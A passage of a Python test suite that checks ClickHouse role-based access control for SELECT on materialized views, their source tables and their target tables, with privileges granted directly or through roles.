                    settings=[("user", f"{user_name}")],
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
@Requirements(
    RQ_SRS_006_RBAC_MaterializedView_Select("1.0"),
)
def select(self, node=None):
    """Test the RBAC functionality of the `SELECT FROM materialized view` command"""
    # Every scenario uses the same server-log instrumentation setup, so run
    # them from a single ordered tuple instead of repeating the call.
    scenarios = (
        select_without_select_privilege,
        select_with_select_privilege_granted_directly_or_via_role,
        select_with_select_privilege_revoked_directly_or_from_role,
        select_without_source_table_privilege,
        select_with_source_table_privilege_granted_directly_or_via_role,
        select_with_subquery_privilege_granted_directly_or_via_role,
        select_with_join_query_privilege_granted_directly_or_via_role,
        select_with_union_query_privilege_granted_directly_or_via_role,
        select_with_join_union_subquery_privilege_granted_directly_or_via_role,
        select_with_nested_views_privilege_granted_directly_or_via_role,
        select_with_privilege_granted_directly_or_via_role_without_target_table_privilege,
    )
    for scenario in scenarios:
        Scenario(run=scenario, setup=instrument_clickhouse_server_log)
@TestScenario
def select_without_select_privilege(self, node=None):
    """Check that user is unable to select on a view without view SELECT privilege.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    user_name = f"user_{getuid()}"
    view_name = f"view_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    with user(node, f"{user_name}"):
        try:
            with When("I have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
                )
            # No privilege was granted, so the SELECT must be rejected.
            with Then("I try to select from view without privilege as the user"):
                node.query(
                    f"SELECT * FROM {view_name}",
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to select from a view if and only if they have select privilege on that view, either directly or from a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privilege granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_with_select_privilege,
            name="select with select privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privilege granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=select_with_select_privilege,
            name="select with select privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_select_privilege(self, user_name, grant_target_name, node=None):
    """Grant SELECT privilege on a view and check the user is able to SELECT from it.

    :param user_name: user that executes the SELECT query
    :param grant_target_name: user or role that receives the privilege
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    if node is None:
        node = self.context.node
    try:
        with When("I have a view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
            )
        with And("I grant SELECT privilege for the view"):
            node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
        # With SELECT granted, the query must succeed and return the expected
        # count.
        with Then("I attempt to select from view with privilege as the user"):
            output = node.query(
                f"SELECT count(*) FROM {view_name}", settings=[("user", f"{user_name}")]
            ).output
            assert output == "1", error()
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_select_privilege_revoked_directly_or_from_role(self, node=None):
    """Check that user is unable to select from a view if their SELECT privilege is revoked, either directly or from a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privilege granted and revoked directly on the user.
    with user(node, f"{user_name}"):
        Scenario(
            # Fixed: previously referenced select_with_select_privilege (the
            # grant-only outline), so the revoke path was never exercised.
            test=select_with_revoked_select_privilege,
            name="select with select privilege revoked directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privilege granted and revoked on a role granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=select_with_revoked_select_privilege,
            name="select with select privilege revoked from a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_revoked_select_privilege(self, user_name, grant_target_name, node=None):
    """Grant and revoke SELECT privilege on a view and check the user is unable to SELECT from it.

    :param user_name: user that executes the SELECT query
    :param grant_target_name: user or role whose privilege is granted then revoked
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    try:
        with When("I have a view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
            # NOTE(review): creates a plain VIEW, unlike the MATERIALIZED VIEW
            # used by the other outlines in this suite — confirm intent.
            node.query(f"CREATE VIEW {view_name} AS SELECT 1")
        with And("I grant SELECT privilege for the view"):
            node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
        with And("I revoke SELECT privilege for the view"):
            node.query(f"REVOKE SELECT ON {view_name} FROM {grant_target_name}")
        # After the revoke, the SELECT must be rejected again.
        with Then("I attempt to select from view with privilege as the user"):
            node.query(
                f"SELECT count(*) FROM {view_name}",
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )
    finally:
        with Finally("I drop the view"):
            node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_without_source_table_privilege(self, node=None):
    """Check that user is unable to select from a view without SELECT privilege for the source table.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    user_name = f"user_{getuid()}"
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    if node is None:
        node = self.context.node
    with table(node, f"{table_name}"):
        with user(node, f"{user_name}"):
            try:
                with When("I create a view from the source table"):
                    node.query(f"DROP VIEW IF EXISTS {view_name}")
                    node.query(
                        f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
                    )
                with And("I grant view select privilege to the user"):
                    node.query(f"GRANT SELECT ON {view_name} TO {user_name}")
                # SELECT on the view alone is not enough — the source table's
                # SELECT privilege is also required.
                with Then(
                    "I attempt to select from view without privilege on the source table"
                ):
                    node.query(
                        f"SELECT count(*) FROM {view_name}",
                        settings=[("user", f"{user_name}")],
                        exitcode=exitcode,
                        message=message,
                    )
            finally:
                with Finally("I drop the view"):
                    node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_source_table_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to select from a view, with source table in the stored query, if and only if
    the user has SELECT privilege for the view and the source table, either directly or from a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_with_source_table_privilege,
            name="select with source table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=select_with_source_table_privilege,
            name="select with source table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_source_table_privilege(self, user_name, grant_target_name, node=None):
    """Grant SELECT privilege on view and the source table for that view and check the user is able to SELECT from the view.

    :param user_name: user that executes the SELECT query
    :param grant_target_name: user or role that receives the privileges
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"
    if node is None:
        node = self.context.node
    with table(node, f"{table_name}"):
        try:
            with Given("I have a view with a source table"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table_name}"
                )
            with And("I grant select privileges"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
                node.query(f"GRANT SELECT ON {table_name} TO {grant_target_name}")
            # With SELECT on both view and source table the query succeeds;
            # the expected count is "0".
            with Then("I check the user is able to select from the view"):
                output = node.query(
                    f"SELECT count(*) FROM {view_name}",
                    settings=[("user", f"{user_name}")],
                ).output
                assert output == "0", error()
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_subquery_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to select from a view where the stored query has two subqueries if and only if
    the user has SELECT privilege for that view and all tables, either directly or through a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_with_subquery,
            name="select with subquery, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=select_with_subquery,
            name="select with subquery, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_subquery(self, user_name, grant_target_name, node=None):
    """Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.

    :param user_name: user that executes the SELECT queries
    :param grant_target_name: user or role that receives the privileges
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    select_view_query = "SELECT count(*) FROM {view_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name},{table2_name}"):
        try:
            with Given("I have a view with a subquery"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y IN (SELECT y FROM {table2_name} WHERE y<2))"
                )
            # SELECT on the view alone must not be enough.
            with When("I grant SELECT privilege on view"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
            with Then("I attempt to select from the view as the user"):
                node.query(
                    select_view_query.format(view_name=view_name),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Each permutation grants SELECT on a partial subset of the three
            # tables (see grant_select_on_table); the SELECT must still fail.
            for permutation in permutations(table_count=3):
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to select from a view as the user"):
                            node.query(
                                select_view_query.format(view_name=view_name),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # With SELECT on all three tables the query succeeds; expected
            # count is "0".
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=3)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                ):
                    with Then("I attempt to select from a view as the user"):
                        output = node.query(
                            select_view_query.format(view_name=view_name),
                            settings=[("user", f"{user_name}")],
                        ).output
                        assert output == "0", error()
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_query_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to select from a view where the stored query includes a `JOIN` statement if and only if
    the user has SELECT privilege on all the tables and the view, either directly or through a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_with_join_query,
            name="select with join, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=select_with_join_query,
            name="select with join, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_query(self, user_name, grant_target_name, node=None):
    """Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them.

    :param user_name: user that executes the SELECT queries
    :param grant_target_name: user or role that receives the privileges
    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    select_view_query = "SELECT count(*) FROM {view_name}"
    if node is None:
        node = self.context.node
    with table(node, f"{table0_name},{table1_name}"):
        try:
            with Given("I have a view with a JOIN statement"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} JOIN {table1_name} USING d"
                )
            # SELECT on the view alone must not be enough.
            with When("I grant SELECT privilege on view"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")
            with Then("I attempt to select from the view as the user"):
                node.query(
                    select_view_query.format(view_name=view_name),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )
            # Each permutation grants SELECT on a partial subset of the two
            # tables (see grant_select_on_table); the SELECT must still fail.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(
                    node, permutation, grant_target_name, table0_name, table1_name
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to select from a view as the user"):
                            node.query(
                                select_view_query.format(view_name=view_name),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )
            # With SELECT on both tables the query must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=2)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                ):
                    with Then("I attempt to select from a view as the user"):
                        node.query(
                            select_view_query.format(view_name=view_name),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_union_query_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to select from a view where the stored query includes a `UNION ALL` statement if and only if
    the user has SELECT privilege on all the tables and the view, either directly or through a role.

    :param node: ClickHouse node to run queries on; defaults to ``self.context.node``
    """
    # getuid() suffixes keep object names unique across repeated runs.
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"
    if node is None:
        node = self.context.node
    # Case 1: privileges granted directly to the user.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_with_union_query,
            name="select with union, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)
    # Case 2: privileges granted to a role that is granted to the user.
    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")
        Scenario(
            test=select_with_union_query,
            name="select with union, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_union_query(self, user_name, grant_target_name, node=None):
    """Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Query template; view_name is substituted via str.format at each call site.
    select_view_query = "SELECT count(*) FROM {view_name}"

    if node is None:
        node = self.context.node

    with table(node, f"{table0_name},{table1_name}"):
        try:
            with Given("I have a view with a UNION statement"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT * FROM {table0_name} UNION ALL SELECT * FROM {table1_name}"
                )

            # SELECT on the view alone must not be enough; both UNION branches'
            # source tables also require SELECT.
            with When("I grant SELECT privilege on view"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")

            with Then("I attempt to select from the view as the user"):
                node.query(
                    select_view_query.format(view_name=view_name),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )

            # Every proper subset of table grants must still fail.
            for permutation in permutations(table_count=2):
                with grant_select_on_table(
                    node, permutation, grant_target_name, table0_name, table1_name
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to select from a view as the user"):
                            node.query(
                                select_view_query.format(view_name=view_name),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )

            # Full bitmask (all tables granted): the query must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=2)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                ):
                    with Then("I attempt to select from a view as the user"):
                        node.query(
                            select_view_query.format(view_name=view_name),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_join_union_subquery_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that user is able to select from a view with a stored query that includes `UNION ALL`, `JOIN` and two subqueries
    if and only if the user has SELECT privilege on all the tables and the view, either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_with_join_union_subquery,
            name="select with join union subquery, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=select_with_join_union_subquery,
            name="select with join union subquery, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_join_union_subquery(self, grant_target_name, user_name, node=None):
    """Grant SELECT on the view and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
    view_name = f"view_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    table4_name = f"table4_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Query template; view_name is substituted via str.format at each call site.
    select_view_query = "SELECT count(*) FROM {view_name}"

    if node is None:
        node = self.context.node

    with table(
        node, f"{table0_name},{table1_name},{table2_name},{table3_name},{table4_name}"
    ):
        try:
            with Given("I have a view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
                # BUG FIX: the second UNION branch previously read {table1_name}
                # again, leaving table2 unused by the view even though it is
                # included in the permutation grants below. That broke the
                # "if and only if" check: a permutation granting every table
                # except table2 would succeed while the test expected failure.
                # The branch now reads {table2_name} so all five tables are
                # referenced by the stored query.
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT y FROM {table0_name} JOIN {table1_name} USING y UNION ALL SELECT y FROM {table2_name} WHERE y IN (SELECT y FROM {table3_name} WHERE y IN (SELECT y FROM {table4_name} WHERE y<2))"
                )

            # SELECT on the view alone must not be enough.
            with When("I grant SELECT privilege on view"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")

            with Then("I attempt to select from the view as the user"):
                node.query(
                    select_view_query.format(view_name=view_name),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )

            # Every proper subset of the five table grants must still fail.
            for permutation in permutations(table_count=5):
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                    table3_name,
                    table4_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to select from a view as the user"):
                            node.query(
                                select_view_query.format(view_name=view_name),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )

            # Full bitmask (all tables granted): the query must succeed.
            with When("I grant select on all tables"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=5)) + 1,
                    grant_target_name,
                    table0_name,
                    table1_name,
                    table2_name,
                    table3_name,
                    table4_name,
                ):
                    with Then("I attempt to select from a view as the user"):
                        node.query(
                            select_view_query.format(view_name=view_name),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestScenario
def select_with_nested_views_privilege_granted_directly_or_via_role(self, node=None):
    """Check that user is able to select from a view with a stored query that includes other views if and only if
    the user has SELECT privilege on all of the views and the source tables for those views, either directly or through a role.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_with_nested_views,
            name="select with nested views, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=select_with_nested_views,
            name="select with nested views, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_with_nested_views(self, grant_target_name, user_name, node=None):
    """Grant SELECT on views and tables in the stored query and check the user is able to SELECT if and only if they have SELECT privilege on all of them."""
    view0_name = f"view0_{getuid()}"
    view1_name = f"view1_{getuid()}"
    view2_name = f"view2_{getuid()}"
    view3_name = f"view3_{getuid()}"
    table0_name = f"table0_{getuid()}"
    table1_name = f"table1_{getuid()}"
    table2_name = f"table2_{getuid()}"
    table3_name = f"table3_{getuid()}"
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")
    # Query template; view3 is the outermost view, so selecting from it
    # requires SELECT on the entire chain of views and tables below it.
    select_view_query = "SELECT count(*) FROM {view3_name}"

    if node is None:
        node = self.context.node

    with table(node, f"{table0_name},{table1_name},{table2_name},{table3_name}"):
        try:
            with Given("I have some views"):
                # view0 -> table0; view1 -> view0 + table1;
                # view2 -> view1 + table2; view3 -> view2 + table3.
                node.query(f"CREATE VIEW {view0_name} AS SELECT y FROM {table0_name}")
                node.query(
                    f"CREATE VIEW {view1_name} AS SELECT y FROM {view0_name} WHERE y IN (SELECT y FROM {table1_name} WHERE y<2)"
                )
                node.query(
                    f"CREATE VIEW {view2_name} AS SELECT y FROM {view1_name} JOIN {table2_name} USING y"
                )
                node.query(
                    f"CREATE VIEW {view3_name} AS SELECT y FROM {view2_name} UNION ALL SELECT y FROM {table3_name}"
                )

            with Then("I attempt to select from a view as the user"):
                node.query(
                    select_view_query.format(view3_name=view3_name),
                    settings=[("user", f"{user_name}")],
                    exitcode=exitcode,
                    message=message,
                )

            # Exhausting all 2^8 grant permutations is expensive, so outside
            # stress mode only a representative subset of bitmasks is checked.
            for permutation in (
                [0, 1, 3, 5, 7, 13, 15, 23, 31, 45, 63, 95, 127, 173, 237, 247, 253],
                permutations(table_count=8),
            )[self.context.stress]:
                with grant_select_on_table(
                    node,
                    permutation,
                    grant_target_name,
                    view3_name,
                    table3_name,
                    view2_name,
                    view1_name,
                    table2_name,
                    view0_name,
                    table1_name,
                    table0_name,
                ) as tables_granted:
                    with When(
                        f"permutation={permutation}, tables granted = {tables_granted}"
                    ):
                        with Then("I attempt to select from a view as the user"):
                            node.query(
                                select_view_query.format(view3_name=view3_name),
                                settings=[("user", f"{user_name}")],
                                exitcode=exitcode,
                                message=message,
                            )

            # Full bitmask (all views and tables granted): must succeed.
            with When("I grant select on all views"):
                with grant_select_on_table(
                    node,
                    max(permutations(table_count=8)) + 1,
                    grant_target_name,
                    view0_name,
                    view1_name,
                    view2_name,
                    view3_name,
                    table0_name,
                    table1_name,
                    table2_name,
                    table3_name,
                ):
                    with Then("I attempt to select from a view as the user"):
                        node.query(
                            select_view_query.format(view3_name=view3_name),
                            settings=[("user", f"{user_name}")],
                        )
        finally:
            with Finally("I drop the views"):
                # Drop in reverse dependency order (view3 first).
                # BUG FIX: the step labels previously said "view0".."view3" in
                # ascending order while the queries dropped view3..view0, so the
                # test log attributed each drop to the wrong view. The labels
                # now match the view actually being dropped.
                with When("I drop view3", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view3_name}")
                with And("I drop view2", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view2_name}")
                with And("I drop view1", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view1_name}")
                with And("I drop view0", flags=TE):
                    node.query(f"DROP VIEW IF EXISTS {view0_name}")
@TestScenario
def select_with_privilege_granted_directly_or_via_role_without_target_table_privilege(
    self, node=None
):
    """Check that user is able to select from a materialized view without target table SELECT privilege."""
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_without_target_table_privilege,
            name="select without target table privilege, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=select_without_target_table_privilege,
            name="select without target table privilege, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_without_target_table_privilege(
    self, grant_target_name, user_name, node=None
):
    """GRANT the user SELECT privilege on the view and check the user is able to successfully SELECT from the view without target table privilege."""
    view_name = f"view_{getuid()}"
    table_name = f"table_{getuid()}"

    if node is None:
        node = self.context.node

    # BUG FIX: the target table was never created, but
    # `CREATE MATERIALIZED VIEW ... TO {table_name}` requires an existing
    # target table, so view creation would fail before the privilege check.
    # Create the target table for the duration of the test, matching the
    # pattern used by the sibling outlines.
    with table(node, f"{table_name}"):
        try:
            with Given("I have a view"):
                node.query(
                    f"CREATE MATERIALIZED VIEW {view_name} TO {table_name} AS SELECT 1"
                )

            with When("I grant SELECT privilege on the view"):
                node.query(f"GRANT SELECT ON {view_name} TO {grant_target_name}")

            # SELECT on the view alone must suffice; no grant is made on the
            # target table.
            with Then("I attempt to select from a view as the user"):
                node.query(
                    f"SELECT * FROM {view_name}", settings=[("user", f"{user_name}")]
                )
        finally:
            with Finally("I drop the view"):
                node.query(f"DROP VIEW IF EXISTS {view_name}")
@TestSuite
def select_from_tables(self, node=None):
    """Testing RBAC functionality of SELECT for tables related to materialized views - target tables, source tables."""
    # Each scenario self-dispatches direct-vs-role grant variants.
    Scenario(
        run=select_from_implicit_target_table_privilege_granted_directly_or_via_role,
        setup=instrument_clickhouse_server_log,
    )
    Scenario(
        run=select_from_explicit_target_table_privilege_granted_directly_or_via_role,
        setup=instrument_clickhouse_server_log,
    )
    Scenario(
        run=select_from_source_table_privilege_granted_directly_or_via_role,
        setup=instrument_clickhouse_server_log,
    )
@TestScenario
@Requirements(RQ_SRS_006_RBAC_MaterializedView_Select_TargetTable("1.0"))
def select_from_implicit_target_table_privilege_granted_directly_or_via_role(
    self, node=None
):
    """Check that user is able to SELECT from the implicit target table created from a materialized view
    if they have SELECT privilege on that table.
    """
    user_name = f"user_{getuid()}"
    role_name = f"role_{getuid()}"

    if node is None:
        node = self.context.node

    # Run the outline twice: direct grants, then grants through a role.
    with user(node, f"{user_name}"):
        Scenario(
            test=select_from_implicit_target_table,
            name="select from implicit target table, privilege granted directly",
        )(grant_target_name=user_name, user_name=user_name)

    with user(node, f"{user_name}"), role(node, f"{role_name}"):
        with When("I grant the role to the user"):
            node.query(f"GRANT {role_name} TO {user_name}")

        Scenario(
            test=select_from_implicit_target_table,
            name="select from implicit target table, privilege granted through a role",
        )(grant_target_name=role_name, user_name=user_name)
@TestOutline
def select_from_implicit_target_table(self, grant_target_name, user_name, node=None):
    """Grant SELECT on the implicit target table and check the user is able to SELECT only if they have SELECT privilege on the table."""
    view_name = f"view_{getuid()}"
    # Materialized views without a TO clause store data in an implicit
    # `.inner.<view>` table; quotes are double-escaped because the query
    # string passes through a shell layer before reaching the server.
    implicit_table_name = f'\\".inner.{view_name}\\"'
    exitcode, message = errors.not_enough_privileges(name=f"{user_name}")

    if node is None:
        node = self.context.node

    try:
        with Given("I have a view"):
            node.query(
                f"CREATE MATERIALIZED VIEW {view_name} ENGINE = Memory AS SELECT 1"
            )

        # No grants yet: reading the inner table must fail.
        with Then("I attempt to SELECT from the implicit target table as the user"):
            node.query(
                f"SELECT * FROM {implicit_table_name}",
                settings=[("user", f"{user_name}")],
                exitcode=exitcode,
                message=message,
            )

        # SELECT on the view does NOT extend to its inner table.
        with When("I grant SELECT privilege on the view"):
